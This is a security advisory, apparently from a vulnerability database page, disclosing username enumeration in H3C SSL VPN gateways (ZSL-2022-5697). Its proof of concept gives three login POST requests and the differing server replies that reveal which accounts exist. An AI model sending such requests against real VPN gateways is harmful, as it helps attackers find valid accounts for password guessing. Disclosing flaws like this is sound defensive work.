Gjoko KrsticZSL-2022-5697H3C SSL VPN Username Enumeration
7.2 High
AI Score
Confidence
Low
Title: H3C SSL VPN Username Enumeration
Advisory ID: ZSL-2022-5697
Type: Local/Remote
Impact: Exposure of Sensitive Information
Risk: (2/5)
Release Date: 12.02.2022
Summary
H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a new generation of professional SSL VPN devices for enterprises. They can function as ingress gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized enterprises.
Description
The weakness is caused due to the login script and how it verifies provided credentials. An attacker can use this weakness to enumerate valid users on the affected application via βtxtUsrNameβ POST parameter.
Vendor
Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. - <https://www.h3c.com>
Affected Version
N/A
Tested On
ssl vpn gateway HttpServer 1.1
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.exploit-db.com/exploits/50742>
[2] <https://packetstormsecurity.com/files/165977/H3C-SSL-VPN-Username-Enumeration.html>
[3] <https://cxsecurity.com/issue/WLB-2022020072>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/219535>
Changelog
[12.02.2022] - Initial release
[16.02.2022] - Added reference [1], [2], [3] and [4]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>H3C SSL VPN Username Enumeration
Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
Product web page: https://www.h3c.com
Affected version: n/a
Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees
to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a
new generation of professional SSL VPN devices for enterprises. They can function as ingress
gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are
for small-to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized
enterprises.
Desc: The weakness is caused due to the login script and how it verifies provided credentials. An
attacker can use this weakness to enumerate valid users on the affected application via 'txtUsrName'
POST parameter.
Tested on: ssl vpn gateway HttpServer 1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5697
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php
24.01.2022
--
Non-valid:
----------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
</p><tr><td align="center">User is not exist</td></tr>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Input password incorrect</td></tr>
Valid:
------
POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=
<tr><td align="center">Local user state is inactive</td></tr>
</body></html>7.2 High
AI Score
Confidence
Low